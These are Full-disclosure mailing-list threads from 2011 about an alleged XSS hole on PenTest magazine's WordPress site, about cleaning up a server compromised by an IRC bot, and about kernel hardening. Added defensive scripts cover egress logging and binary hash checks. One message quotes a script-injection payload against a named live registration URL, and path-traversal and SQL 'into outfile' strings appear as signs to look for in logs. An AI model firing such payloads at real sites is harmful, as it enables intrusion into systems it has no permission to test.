> 2011/12/8 Gage Bystrom themadichi...@gmail.com
> > Not really. If it isn't exploitable in any sense of the word it's not a vulnerability. It's akin to opening up Firebug, writing the generic XSS PoC and calling the site vulnerable :P I'd love to bash on these guys as much as you want to, but let it be a real vulnerability. If it is one, then kudos.
> >
> > On Dec 7, 2011 3:16 PM, Tomy supp...@vs-db.info wrote:
> > > it does not matter, it's about the fact that someone who publishes such a newspaper should know his stuff..
> > >
> > > Tomy
> > >
> > > On 8 Dec 2011, at 00:04, Gage Bystrom wrote:
> > > > Nice, but is it stored? Or at least reflective?
> > > >
> > > > On Dec 7, 2011 2:59 PM, Tomy supp...@vs-db.info wrote:
> > > > > still vulnerable:
> > > > >
> > > > > sample: http://pentestmag.com:80/wp-login.php?action=register (XSS)
> > > > > e-mail: john@somewhere.com</sCrIpT><sCrIpT>alert(87118)</sCrIpT>
> > > > >
> > > > > LOL
> > > > >
> > > > > On 7 Dec 2011, at 23:30, xD 0x41 wrote:
> > > > >
> > > > > Tomy supp...@vs-db.info
> > >
> > > Tomy supp...@vs-db.info
>
> --
> Ferenc Kovács
> @Tyr43l - http://tyrael.hu
Re: [Full-disclosure] PenTest mag
Slightly hard to understand what you're saying but I think I get the point. Reminds me of a quote from someone: "No self respecting hacker would use Wordpress." Can't remember where I read that.

On Dec 7, 2011 3:41 PM, xD 0x41 sec...@gmail.com wrote:
> ah k, i have not really looked at it but ye, xss has never ranked too highly with me... but, i guess if it were to be defaced, then people would probably call it *hacked* lol... i guess people don't get it yet, no one uses their web box, as their actual, 'safe' box...not anyone i know. anyhow ye.. i don't know much in the area, but, i'd hate to be pwnd thru a login.php :s
>
> 2011/12/8 Gage Bystrom themadichi...@gmail.com:
> > Not really. If it isn't exploitable in any sense of the word it's not a vulnerability. It's akin to opening up Firebug, writing the generic XSS PoC and calling the site vulnerable :P I'd love to bash on these guys as much as you want to, but let it be a real vulnerability. If it is one, then kudos.
> >
> > On Dec 7, 2011 3:16 PM, Tomy supp...@vs-db.info wrote:
> > > it does not matter, it's about the fact that someone who publishes such a newspaper should know his stuff..
> > >
> > > Tomy
> > >
> > > On 8 Dec 2011, at 00:04, Gage Bystrom wrote:
> > > > Nice, but is it stored? Or at least reflective?
> > > >
> > > > On Dec 7, 2011 2:59 PM, Tomy supp...@vs-db.info wrote:
> > > > > still vulnerable:
> > > > >
> > > > > sample: http://pentestmag.com:80/wp-login.php?action=register (XSS)
> > > > > e-mail: john@somewhere.com</sCrIpT><sCrIpT>alert(87118)</sCrIpT>
> > > > >
> > > > > LOL
> > > > >
> > > > > On 7 Dec 2011, at 23:30, xD 0x41 wrote:
> > > > >
> > > > > Tomy supp...@vs-db.info
> > >
> > > Tomy supp...@vs-db.info
Re: [Full-disclosure] PenTest mag
What are you talking about? The entire time I asked questions 'cause I wasn't in a position to check myself. The Wordpress quote was just a reference to the frequent vulnerabilities in plugins and themes. I didn't give a rat's ass if the site was secure or not, I was asking questions to confirm if it was a vuln or not.

On Dec 7, 2011 4:03 PM, Christian Sciberras uuf6...@gmail.com wrote:
> Gage, if you had the good sense of looking around before talking blindly, you'd have noticed these guys are using a 3rd party plugin called ym_reg_form, probably from these other guys http://www.yourmembers.co.uk/ . By that standard, Wordpress is as safe as Linux running sshd root:root, 24/7.
>
> On the other hand, this doesn't excuse these people from checking their own software. Paying for something that happened to be shit isn't an excuse either.
>
> Chris.
>
> 2011/12/8 Gage Bystrom themadichi...@gmail.com
> > Slightly hard to understand what you're saying but I think I get the point. Reminds me of a quote from someone: "No self respecting hacker would use Wordpress." Can't remember where I read that.
> >
> > On Dec 7, 2011 3:41 PM, xD 0x41 sec...@gmail.com wrote:
> > > ah k, i have not really looked at it but ye, xss has never ranked too highly with me... but, i guess if it were to be defaced, then people would probably call it *hacked* lol... i guess people don't get it yet, no one uses their web box, as their actual, 'safe' box...not anyone i know. anyhow ye.. i don't know much in the area, but, i'd hate to be pwnd thru a login.php :s
> > >
> > > 2011/12/8 Gage Bystrom themadichi...@gmail.com:
> > > > Not really. If it isn't exploitable in any sense of the word it's not a vulnerability. It's akin to opening up Firebug, writing the generic XSS PoC and calling the site vulnerable :P I'd love to bash on these guys as much as you want to, but let it be a real vulnerability. If it is one, then kudos.
> > > >
> > > > On Dec 7, 2011 3:16 PM, Tomy supp...@vs-db.info wrote:
> > > > > it does not matter, it's about the fact that someone who publishes such a newspaper should know his stuff..
> > > > >
> > > > > Tomy
> > > > >
> > > > > On 8 Dec 2011, at 00:04, Gage Bystrom wrote:
> > > > > > Nice, but is it stored? Or at least reflective?
> > > > > >
> > > > > > On Dec 7, 2011 2:59 PM, Tomy supp...@vs-db.info wrote:
> > > > > > > still vulnerable:
> > > > > > >
> > > > > > > sample: http://pentestmag.com:80/wp-login.php?action=register (XSS)
> > > > > > > e-mail: john@somewhere.com</sCrIpT><sCrIpT>alert(87118)</sCrIpT>
> > > > > > >
> > > > > > > LOL
> > > > > > >
> > > > > > > On 7 Dec 2011, at 23:30, xD 0x41 wrote:
> > > > > > >
> > > > > > > Tomy supp...@vs-db.info
> > > > >
> > > > > Tomy supp...@vs-db.info
Re: [Full-disclosure] one of my servers has been compromized
Ahh I see. Then yeah I would advise using iptables to deny as much outgoing traffic as possible and set up the chain so that all attempted traffic statistics get logged. Back that up with denying as much incoming traffic as possible. Then monitor for any spawning services with netstat. Assuming no rootkit was involved (and I explained how unlikely that'd be), then any incoming connection to seize back the box via a backdoor would rely on a process spawning a daemon which will be caught. Any connect-back backdoor will not only be stopped immediately but since you can hone in via the logged statistics you can know what remote port it's looking for. Then you simply watch netstat for outgoing connections to said port and you got 'em.

The 'tricky' part is if they have some sort of ssh based access. Contrary to some previous suggestions locking down bash and logging users is nigh useless if the attacker has remotely browsed the man pages for the client (here's a hint, you don't need to 'login' to get a shell as long as you don't mind not having a tty). Instead the remedy is fairly simple. Reinstall ssh (preferably from source) and then change every user password. If the daemon was changed, it's now safe. If a password was compromised it's now useless. No matter how you look at it, if no kernel rootkit was in place then any backdoor becomes fudged. From there it's a simple matter of wiping /tmp of any code scripts and then dealing with the matter of the vulnerable web pages.

'Cause yes, even unusual side channels relying on icmp or dns queries become useless. Iptables will still record the unusual jump in stats for those and they've just handed you and potential authorities either their home box (if they're morons), or revealed another compromised server. Which means it's a win-win even if they tried a 'clever' trick like that. Set the right options, plug the holes, and relish in the fact they weren't serious about your box and you will be just fine.

On Dec 6, 2011 1:18 AM, Lucio Crusca lu...@sulweb.org wrote:
> Gage Bystrom wrote:
> > I would suggest iptables but the OP stated he doesn't own the server and has no root access.
>
> If I ever stated that, it means I misused my poor English for sure... I DO have root access and I DO own the server, where the server means the *guest* OpenVZ instance. I DID configure iptables yesterday in order to block outgoing connections. What I can't do is upgrade the kernel because OpenVZ is a limited paravirtualization system where the guest kernel is more like a stub on top of the only shared host kernel. I have no control over the host kernel, so I can't upgrade it.
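Gage's approach in the message above (drop as much outbound traffic as possible, log what gets dropped, then read the logged destination ports to see where a connect-back is headed) as an added shell example; this is not code from anyone in the thread. The `apply_egress_policy` function holds the iptables rules and is never called automatically, because it needs root and would cut a box off its network; the `EGRESS-DROP:` log prefix, the resolver address, the interface and the sample kernel log lines are all constructed for the demonstration.

```shell
#!/bin/sh
# Added example, not from the thread: default-deny egress with logging,
# and a summary of what the log shows was blocked. The prefix, addresses,
# interface and sample log lines are constructed for illustration.

RESOLVER=192.0.2.53          # assumed upstream DNS resolver (constructed)
LOG_PREFIX="EGRESS-DROP: "   # assumed log prefix (constructed)

# Install the policy. Needs root and is deliberately never called here.
apply_egress_policy() {
    iptables -P OUTPUT DROP
    iptables -F OUTPUT
    iptables -A OUTPUT -o lo -j ACCEPT
    # Replies on connections that came in (the web server, sshd) stay allowed.
    iptables -A OUTPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
    # The only new outbound connections tolerated: DNS to our own resolver.
    iptables -A OUTPUT -p udp --dport 53 -d "$RESOLVER" -j ACCEPT
    iptables -A OUTPUT -p tcp --dport 53 -d "$RESOLVER" -j ACCEPT
    # Everything else is logged (rate-limited so a bot cannot flood syslog)
    # and then dropped. The LOG target records SRC/DST/PROTO/DPT per packet.
    iptables -A OUTPUT -m limit --limit 30/min --limit-burst 50 \
        -j LOG --log-prefix "$LOG_PREFIX" --log-level 4
    iptables -A OUTPUT -j DROP
}

# Read kernel log lines on stdin and print "count PROTO DST DPT",
# busiest destination first. ICMP carries no port, so DPT becomes "-".
summarize_blocked_egress() {
    grep -F "$LOG_PREFIX" | awk '
    {
        proto = ""; dst = ""; dpt = "-"
        for (i = 1; i <= NF; i++) {
            if (split($i, kv, "=") < 2) continue   # skip flags like DF, SYN
            if (kv[1] == "PROTO") proto = kv[2]
            else if (kv[1] == "DST") dst = kv[2]
            else if (kv[1] == "DPT") dpt = kv[2]
        }
        if (dst != "") count[proto " " dst " " dpt]++
    }
    END { for (k in count) print count[k], k }' | sort -rn
}

# Constructed sample log: three connect attempts to an IRC port (a typical
# connect-back bot), two DNS queries to a resolver that is not ours (the
# DNS side channel Gage mentions), one ping, and one unrelated kernel line.
SAMPLE_LOG='Dec  6 01:02:03 web kernel: [1000.1] EGRESS-DROP: IN= OUT=eth0 SRC=10.0.0.5 DST=198.51.100.7 LEN=60 TOS=0x00 PREC=0x00 TTL=64 ID=1 DF PROTO=TCP SPT=43210 DPT=6667 WINDOW=29200 RES=0x00 SYN URGP=0
Dec  6 01:02:04 web kernel: [1001.2] EGRESS-DROP: IN= OUT=eth0 SRC=10.0.0.5 DST=198.51.100.7 LEN=60 TOS=0x00 PREC=0x00 TTL=64 ID=2 DF PROTO=TCP SPT=43211 DPT=6667 WINDOW=29200 RES=0x00 SYN URGP=0
Dec  6 01:02:05 web kernel: [1002.3] EGRESS-DROP: IN= OUT=eth0 SRC=10.0.0.5 DST=203.0.113.9 LEN=70 TOS=0x00 PREC=0x00 TTL=64 ID=3 DF PROTO=UDP SPT=51000 DPT=53 LEN=50
Dec  6 01:02:06 web kernel: [1003.4] e1000: eth0 NIC Link is Up 1000 Mbps Full Duplex
Dec  6 01:02:07 web kernel: [1004.5] EGRESS-DROP: IN= OUT=eth0 SRC=10.0.0.5 DST=198.51.100.7 LEN=60 TOS=0x00 PREC=0x00 TTL=64 ID=4 DF PROTO=TCP SPT=43212 DPT=6667 WINDOW=29200 RES=0x00 SYN URGP=0
Dec  6 01:02:08 web kernel: [1005.6] EGRESS-DROP: IN= OUT=eth0 SRC=10.0.0.5 DST=203.0.113.9 LEN=70 TOS=0x00 PREC=0x00 TTL=64 ID=5 DF PROTO=UDP SPT=51001 DPT=53 LEN=50
Dec  6 01:02:09 web kernel: [1006.7] EGRESS-DROP: IN= OUT=eth0 SRC=10.0.0.5 DST=192.0.2.1 LEN=84 TOS=0x00 PREC=0x00 TTL=64 ID=6 DF PROTO=ICMP TYPE=8 CODE=0 ID=777 SEQ=1'

# Convenience wrapper so the result can be checked: first line of the summary.
top_blocked_destination() {
    printf '%s\n' "$SAMPLE_LOG" | summarize_blocked_egress | head -n 1
}

# Stand-alone run over the constructed sample.
printf '%s\n' "$SAMPLE_LOG" | summarize_blocked_egress
```

On a real box, pipe `journalctl -k` or the kernel log file into `summarize_blocked_egress`; the top line is the remote port Gage says to then watch in netstat. The rate limit on the LOG rule matters: without it a bot retrying every second can fill the disk with exactly the evidence you wanted to keep.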
Re: [Full-disclosure] one of my servers has been compromized
But the problem with that is it is a mentality roughly a little more than a decade old. What you described is a userland rootkit detector. Problem is no one uses userland rootkits anymore! Sure there was some recent development in managed code rootkits but it really hasn't gone anywhere and is Windows centric. Not to mention your plan is totally flawed. You assume md5sum is safe to begin with. Meaning that to be remotely safe with this you have to run the script from a livecd. Meaning you have to bring down the server every time you suspect you MAY have been compromised. Completely unacceptable for anyone other than a home user. The only way to circumvent such issues is to recreate tripwire, in which you still have the same fundamental problems tripwire has always had. I know ya mean well, but your first block of advice isn't practical or effective. The second one the OP already did so all's well for that. :)

On Dec 6, 2011 10:19 AM, Paul Schmehl pschmehl_li...@tx.rr.com wrote:
> A poor man's root kit detector is to take md5sums of critical system binaries (you'd have to redo these after patching), and keep the list on an inaccessible media (such as a thumb drive). If you think the system is compromised, run md5sum against those files, and you will quickly know. You could even keep statically compiled copies on the thumb drive to use in an investigation.
>
> Start with things you use to check for problems; ls, ps, fstat, sockstat, netstat, wtmp, nc, sshd, etc. It would be fairly trivial to create a simple shell script that would compare the md5sums of system binaries to the saved copies and flag anomalies.
>
> And, of course, if you can take a system offline, there are a number of bootable security distros that allow you to do extensive analysis of systems.
>
> http://www.darknet.org.uk/2006/03/10-best-security-live-cd-distros-pen-test-forensics-recovery/
>
> In general, on Unix systems, look for oddly named directories in odd places (like /tmp, /dev, etc.) and review logs that have been syslogged elsewhere for telltale signs of compromise. It's surprising how few times the shell history logs get wiped, but there are some kits out there that do that for you.
>
> Web apps and improper permissions (world writeable) are the two most frequent causes of compromises that I've seen on Unix systems.
>
> --On December 5, 2011 1:53:21 PM + Dan Ballance tzewang.do...@gmail.com wrote:
> > Thanks for the heads-up on rkhunter Gage. Is there anything else out there atm that works as a reasonable root kit detector or is such a thing considered impossible now? I realise a skilled attack will be able to bury itself without a trace, but I'm thinking of something that can be used in less skilled breaches such as the one thought to have been identified in this thread. Sometimes something imperfect is still better than nothing I think.
> >
> > Also, am I correct to think that using something like tripwire is the best way to detect root kits properly, but that it obviously needs installing when the box is fresh and before it has been physically connected to a network?
> >
> > thanks to everyone for their valuable contributions here - much appreciated!
> >
> > dan :)
> >
> > On 5 December 2011 11:13, Gage Bystrom themadichi...@gmail.com wrote:
> > > If it was a rootkit then trying to run the outdated rkhunter would be a moot point. Whatever seizes the kernel first wins, hands down. Fortunately for him, since the bot was so easy to find in the first place and such a simple way of maintaining it, the box was clearly seized by someone who didn't give a rat's ass about it. Probably a skiddie or an automated attack to begin with.
> > >
> > > As for plugging any security holes, check your httpd error logs. If you noted down the time of the bot file's creation date you would look around the same time for suspicious log entries. If they were as careless in scrubbing the logs as they were holding the box it would give you a look into how it may have been compromised. If you're getting things like ../.../../../../etc/passwd then some sort of lfi vuln was likely exploited, start grepping your php files for stuff like include(), or if you're getting something like into outfile then check your mysql user permissions and don't let it have file perms, and then start grepping down for sql vulns. If it comes down to being too much of a hassle to get all the obvious vulns at least then go to your boss, admit there is an issue and that time needs to be taken to remove such legacy code as this could have been a far worse incident if it had been more targeted and the end goal wasn't a botnet.
> > >
> > > On Dec 5, 2011 3:02 AM, Dan Ballance tzewang.do...@gmail.com wrote:
> > > > I'm no expert, but here's something to get you started while you wait for more experienced replies.
> > > >
> > > > Check for root kits:
> > > >
> > > > sudo apt-get install rkhunter
> > > > sudo rkhunter
Re: [Full-disclosure] one of my servers has been compromized
My bad, should have said that you can't trust the md5sum tampering (since you stated to have a static copy on the flash drive) but you couldn't trust it since you couldn't trust the system calls. The immediate moment you have to worry about a legit userland rootkit you have to worry about a kernel rootkit. After all you have to consider the psychology of the attacker. If you were to compromise a box, and cared enough to hide a backdoor they cannot detect without static, write-proof media, then you care enough to go the extra step for a kernel rootkit. Otherwise you would be spending even more time and effort to make your userland kit work to satisfaction for a far weaker hold on the box. It would simply be idiotic. And I think we can all agree that an attacker able to do either of the above is not an idiot.

On Dec 6, 2011 10:19 AM, Paul Schmehl pschmehl_li...@tx.rr.com wrote:
> A poor man's root kit detector is to take md5sums of critical system binaries (you'd have to redo these after patching), and keep the list on an inaccessible media (such as a thumb drive). If you think the system is compromised, run md5sum against those files, and you will quickly know. You could even keep statically compiled copies on the thumb drive to use in an investigation.
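Paul's poor man's detector, quoted here and in two messages above, as an added shell example that is not code from any poster. It uses sha256sum where Paul wrote md5sum (my substitution; the script is otherwise the same idea): hash a list of binaries into a baseline, keep the baseline together with static copies of the tools on read-only media, and later flag anything modified or missing. The demo directory, the stand-in files and the tampering it performs are constructed for the example. It inherits exactly the limit Gage raises: the hashes are only as trustworthy as the kernel they are computed on, so it belongs on the live CD or next to the static binaries, not in the box's own /usr/bin.

```shell
#!/bin/sh
# Added example, not from the thread: baseline-and-verify for critical
# binaries in the spirit of Paul's md5sum idea. sha256sum is used in place
# of md5sum (my substitution; the script works the same with either).
# Run make_baseline after install/patching and keep the baseline file, plus
# static copies of sh, sha256sum, sort and cut, on read-only media.

# make_baseline BASELINE FILE...  Records "hash  path" lines, sorted by path.
make_baseline() {
    out=$1; shift
    sha256sum "$@" | sort -k2 > "$out"
}

# verify_baseline BASELINE  Prints one line per anomaly (MODIFIED or MISSING).
# Exit status 0 = clean, 1 = something changed, so cron can alert on it.
verify_baseline() {
    rc=0
    while read -r expected path; do
        if [ ! -e "$path" ]; then
            echo "MISSING  $path"; rc=1; continue
        fi
        actual=$(sha256sum "$path" | cut -d' ' -f1)
        if [ "$actual" != "$expected" ]; then
            echo "MODIFIED $path"; rc=1
        fi
    done < "$1"
    return $rc
}

# Demo on a constructed tree: stand-in files play the role of ls, ps and
# netstat; a simulated userland kit then trojans ls and deletes ps.
# Returns verify_baseline's status so the result can be checked.
demo_tamper_detection() {
    tmp=$(mktemp -d) || return 2
    mkdir -p "$tmp/bin"
    printf 'original ls\n'      > "$tmp/bin/ls"
    printf 'original ps\n'      > "$tmp/bin/ps"
    printf 'original netstat\n' > "$tmp/bin/netstat"
    ( cd "$tmp" && make_baseline baseline.txt bin/ls bin/ps bin/netstat )
    printf 'trojaned ls\n' > "$tmp/bin/ls"    # simulated tampering
    rm -f "$tmp/bin/ps"                       # simulated removal
    ( cd "$tmp" && verify_baseline baseline.txt )
    rc=$?
    rm -rf "$tmp"
    return $rc
}

# Stand-alone run: exit status 1 from the demo means "changes found".
demo_tamper_detection || echo "verify exit status: $? (1 = changes found)"
```

The baseline is sorted by path so two baselines taken at different times can be compared with diff as well; the non-zero exit status is what a cron job or the OSSEC-style log watcher mentioned later in the thread would key on.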
Re: [Full-disclosure] one of my servers has been compromized
Sounds pretty neat to be honest. But one thing I'm wondering is that if they have root, what's stopping them from turning that off? After all they need root to load the modules in the first place, so if they are in a position to want to do that, then they are in a position to turn that off. Granted they probably wouldn't be able to load modules till next boot (at least I'd probably cry if that wasn't the case) but even that can be a win scenario depending on how they want to execute the final step.

Even in the scenario that they can't unneuter root, that's even a worse situation. Marginal protection will fall in the face of what needs to be done. Namely taking that semi-permanent step to neuter root could be a serious pain if suddenly you needed unneutered root again. Would likely have to take the system down to fix it. Who wants to be the guy to explain that situation to their boss? Ergo I'm pretty doubtful that such an option couldn't be reversed by root and even if you can, it's a pretty large risk to do so if the server is fairly important. But the HIDS itself could be a formidable opponent (I'm going off your word for this one), and the kernel.panic_on_oops is a good idea since at least then you can blame the shutdown on an attacker that screwed up and likely left ample evidence behind.

Basically what I've been trying to say (outside of satisfying my curiosity about several good points) is that people need to pay attention to who their 'opponent' is at the moment. You remedy the problem presented by the opponent with the right response. Anything more is a waste, anything less is disastrous. Maybe that's why people like to over-respond to things, to be on the safe side, but all that means is you are far easier to figure out and predict for a skilled attacker. What's worse, if you are applying fixes to things that are a nonissue to an attacker in the first place then you are in a false sense of security. Not to say that all the things mentioned have been bad ideas (I'm endorsing several of the good ones), but people need to make sure they understand what it is they are /really/ stopping or mitigating and ask themselves what is it that they should be stopping or mitigating. Good tools for the wrong job still makes them wrong tools for one's situation.

On Dec 6, 2011 12:40 PM, John Jacobs flamdu...@hotmail.com wrote:
> Those considering Tripwire I would ask they take a look at OSSEC-HIDS; the filesystem change notification is outstanding and with inotify() support you get immediate notification of changes. The monitoring and alerting of log files is also exceptional. I am not affiliated with OSSEC in any way.
>
> http://www.ossec.net/main/about
>
> I would recommend from a rooting aspect that kernel module loading be disabled after boot. This is accomplished by removing the CAP_SYS_MODULE permission using something like lcap on older systems or by using the sysctl value of 'kernel.modules_disabled = 1'. This can save a box by preventing automatic or intentional loading of vulnerable modules or a module-based rootkit. The sysctl value of 'kernel.panic_on_oops = 1' also is a good idea.
>
> Thanks,
> John
Re: [Full-disclosure] one of my servers has been compromized
Maybe I'm misreading what you said, and if so please correct me, but whether or not the changes described were applied in the first place wouldn't change the issue that if you needed root unneutered again you would need to bring down the system. Especially if the change doesn't really solve anything in the first place and assuming that the change can't be reversed by root itself; that would defeat the whole purpose of even using that option in a security context.

On Dec 6, 2011 3:05 PM, valdis.kletni...@vt.edu wrote:

On Tue, 06 Dec 2011 13:20:51 PST, Gage Bystrom said:

serious pain if suddenly you needed unneutered root again. Would likely have to take the system down to fix it. Who wants to be the guy to explain that situation to their boss?

If the server is critical enough that you can't take it down to fix it, it should have been in an HA configuration in the first place. Who wants to be the guy to explain to the boss that you're dead in the water because of a bad system board?
Re: [Full-disclosure] one of my servers has been compromized
Well in that case it becomes fairly sane, assuming you've safeguarded against one of the worst-case scenarios like Valdis previously mentioned. There are a handful of things I can think of however that could still work, at which point it depends on the attacker's goals. But at that point it'd be a complete loss for the defender, and only a half victory for the attacker. After all the defender only wins if the attacker fails to accomplish his goals. The minute he changes his goals into something you've already been forced to concede to him, the minute he concedes the following: I'm not getting the kernel, and one of the following: I'm not modifying critical files, or the intrusion has a high chance of being detected. But meh, at that point it is an unrealistic scenario anyways. An attacker who can recognize that, while going through with the decision, while being able to plan ahead, while being skilled enough to actually prepare for the plan, while actually encountering the scenario needed for the prerequisites for this to occur is perhaps the very scenario behind the "everything can be hacked" possibility we all inherently recognize.

Oh well, anyways this thread has been very interesting to me, and I'm glad that I'm not the only one who could see how over-responding would have been completely useless to the OP. That and he likely has more than he needs to put an end to his current circumstance.

On Tue, Dec 6, 2011 at 5:33 PM, John Jacobs flamdu...@hotmail.com wrote:

Sounds pretty neat to be honest. But one thing I'm wondering is that if they have root, what's stopping them from turning that off? After all they need root to load the modules in the first place, so if they are in a position to want to do that, then they are in a position to turn that off. Granted they probably wouldn't be able to load modules till next boot (at least I'd probably cry if that wasn't the case) but even that can be a win scenario depending on how they want to execute the

Hi Gage, thank you for your reply. What you are missing is that by disabling kernel module loading you are applying a defense-in-depth strategy to prevent a *vulnerable* module from automatically loading in the first place resulting in root compromise. I believe you may not be aware that some modules are loaded automatically if a corresponding special device is accessed. Usually the userspace modprobe utility is executed though this can be controlled by the value of /proc/sys/kernel/modprobe. Preventing module loading has historically been a valuable way to prevent privilege escalation or further root compromise. Such an example would be the 'ptrace' exploit, see http://www.sans.org/security-resources/malwarefaq/Ptrace.php

Historically there have been various kernel modules that are vulnerable that could be loaded by userland non-root programs or access. Ubuntu likes to automatically load modules. Removing CAP_SYS_MODULE or kernel.modules_disabled=1 makes good security sense. See http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commitdiff;h=3d43321b7015387cfebbe26436d0e9d299162ea1 and http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commitdiff;h=25354c4fee169710fd9da15f3bb2abaa24dcf933 and https://wiki.ubuntu.com/Security/Features#block-modules

The goal here is defense in depth. Revocation of loading the kernel modules cannot be undone unless a system reboot is effected, which should be highly suspicious. The goal isn't about protecting one's boxens from a theoretical boogie-man, it is to leverage all available and sane methods for properly securing one's box. I see no point to to use these options.

Thanks, John
Re: [Full-disclosure] distributing passwords to users
I'm disturbed in the first place that you want to distribute password lists to multiple users. I'm disturbed more so that there is no apparent cognitive dissonance preventing you from functioning enough to have sent that email. Someone please tell me that I'm not the only one disturbed here? And if I am, point to me why please?

On Mon, Dec 5, 2011 at 7:30 PM, G V gvasi...@gmail.com wrote:

Hi, From your experience, what's the best secure and easy way to update a password list and distribute it to 1000 or so unix users? The users would have different privilege levels and different access on network. Throwing ideas, I can think of: pgp (difficult to maintain a separate file for each user), web app (would need to be secured over ssl, possibly password protected), usb disks (difficult to manage changes). Anyone using an enterprise level app (commercial or not) to share passwords to users, manage changes and so on? Any other ideas I can use? Thank you, George Vasiliu
Re: [Full-disclosure] one of my servers has been compromized
If it was a rootkit then trying to run the outdated rkhunter would be a moot point. Whatever seizes the kernel first wins, hands down. Fortunately for him, since the bot was so easy to find in the first place and such a simple way of maintaining it, the box was clearly seized by someone who didn't give a rat's ass about it. Probably a skiddie or an automated attack to begin with.

As for plugging any security holes, check your httpd error logs. If you noted down the time of the bot file's creation date you would look around the same time for suspicious log entries. If they were as careless in scrubbing the logs as they were holding the box it would give you a look into how it may have been compromised. If you're getting things like ../.../../../../etc/passwd then some sort of LFI vuln was likely exploited, start grepping your php files for stuff like include(), or if you're getting something like "into outfile" then check your mysql user permissions and don't let it have file perms, and then start grepping down for SQL vulns. If it comes down to being too much of a hassle to get all the obvious vulns at least then go to your boss, admit there is an issue and that time needs to be taken to remove such legacy code as this could have been a far worse incident if it had been more targeted and the end goal wasn't a botnet.

On Dec 5, 2011 3:02 AM, Dan Ballance tzewang.do...@gmail.com wrote:

I'm no expert, but here's something to get you started while you wait for more experienced replies. Check for root kits:

sudo apt-get install rkhunter
sudo rkhunter --update
sudo rkhunter --check

On 5 December 2011 10:44, Lucio Crusca lu...@sulweb.org wrote:

Hello *, I'm not new here, but I've mostly lurked all the time through gmane. I never believed it could happen to me until it actually happened: they compromized one of my servers. It's a Ubuntu 10.04 server with all security patches regularly applied. I'm inclined to believe they used some hole in the web application, which is an old customized Virtuemart version (1.1.3), which is not upgradable because of the invasive code customizations (I'm not the author of that code, so I have no clue about what had been changed back then). Now the problem for me is to track down the security hole. Here is the email my provider received and forwarded to me:

Subject: ISP Report; botnet activity on irc.undernet.org

[...]

Hello, I am an operator on the irc chat network, irc.undernet.org and I would like you to investigate the owner of the IP addresses that are listed at the foot of this email. This/These host(s) have likely been compromised, and had an altered/rogue process installed on it, and was part of a botnet that was found on our network. The exploit or compromise running on this system is likely to be an irc bot. Can you please alert the person who is responsible for its security to patch/upgrade, remove the irc process and secure their system.

= Unix System owners =

A favourite place for hiding the bot(s) is in tmp and in /var/tmp/ or /dev/shm/ or in a user's home directory; sometimes it may be hidden like /tmp/. ./ or similar. The bot files can usually be found by running these one line commands as the root user.

find / -exec grep -l undernet {} +
find / -exec grep -l sybnc {} +
find / -name *.set | perl -pe 's/.\/\w+-(\w+)-.*/$1/' | sort | uniq
find / -name inst | perl -pe 's/.\/\w+-(\w+)-.*/$1/' | sort | uniq
netstat -tanp
lsof -i tcp:Port number

*netstat looking for connections to remote port 6667 or the range of ports between 6660-7000; once you find the port you can use the command lsof -i tcp:portnumber to determine which process/user it is running under, and terminate it.

= Windows System Owners =

most windows bots are mIRC scripted bots and generally need a file called mirc.ini to run, you should search for this file. Run a good antivirus scanner and firewall.

This IP/host may be removed from our Irc network due to the risks it presents to our users. Should you need any help with removing the files or bot process, feel free to contact me by mail or on our network, which you connect to using any irc client and issuing /server irc.undernet.org

I look forward to your reply

Scot

* Affected host/IPs, capture time is GMT+1: United Kingdom and servers they were connected to. Please note: when resolving server names to IP Addresses that all our servers end with .undernet.org (for example) Tampa.FL.US. is actually Tampa.FL.US.undernet.org

Important: If you reply to this mail needing further information, please leave this mail intact, or supply us with the IP Address(es) in question, as we reference these mails by the unique IP Address

Time of Capture: DECEMBER 3, 2011 10:03:48 PM

List of IP address(es) and server it connected to:

my.server.ip.address (CHICAGO.IL.US BUDAPEST.HU.EU
Re: [Full-disclosure] one of my servers has been compromized
Tripwire is awesome for many reasons. The original use of rootkit detection is no longer one of them. It was used back when userland rootkits were big; it has zero effect on kernel rootkits. That being said you can use it to watch other critical files for improper access. Keep tabs on your cron files, configs, and your web pages (why crack password hashes when you can force the login script to hand deliver the plaintext?), etc.

Afaik, rootkit detection has made practically no progress. In part because of several advancements in rootkits and also in part because of the overzealous trend in reimaging even the slightest compromised box. That being said a modern rootkit detector would need to be installed first and watch for suspicious behavior, such as attempting to hook system calls and watching kernel module loading. Nothing but the kernel's mod loader should have a legitimate reason to change the list of kernel modules.

In OP's case he really shouldn't need to worry about a rootkit. This wasn't a targeted attack. If it was, or even if the script tried to load a rootkit then he wouldn't even have seen the questionable files in the first place, nor the processes, or the loader. He wouldn't have even been able to grep them. Also deploying a rootkit as part of a serious attack is annoying. You fuck up one thing and not only have you lost the box, but left a strew of evidence that you were trying to hide. Not to mention public rootkits never really caught up with the kernel developments. Most rootkits in place are still targeting 2.4 kernels because only smart dedicated attackers would have the skills to develop and deploy a modern rootkit for a modern kernel. Such an attacker wouldn't make so many rookie/nonchalant mistakes as the attacker on the OP's box did. At most he needs to be concerned if he had caught all the backdoors or not.

Considering he doesn't realistically need to worry about a rootkit (remember, rootkits are annoying, usually easier and more practical to stay quiet, get what you want, and leave quietly), then he could watch for outgoing connections while monitoring any new open ports that have spawned. I would suggest iptables but the OP stated he doesn't own the server and has no root access. Sure there are many clever ways to reserve access but they all start falling apart as long as you're waiting and watching for them to make a peep.

On Dec 5, 2011 5:53 AM, Dan Ballance tzewang.do...@gmail.com wrote:

Thanks for the heads-up on rkhunter Gage. Is there anything else out there atm that works as a reasonable root kit detector or is such a thing considered impossible now? I realise a skilled attack will be able to bury itself without a trace, but I'm thinking of something that can be used in less skilled breaches such as the one thought to have been identified in this thread. Sometimes something imperfect is still better than nothing I think. Also, am I correct to think that using something like tripwire is the best way to detect root kits properly, but that it obviously needs installing when the box is fresh and before it has been physically connected to a network? thanks to everyone for their valuable contributions here - much appreciated! dan :)

On 5 December 2011 11:13, Gage Bystrom themadichi...@gmail.com wrote:

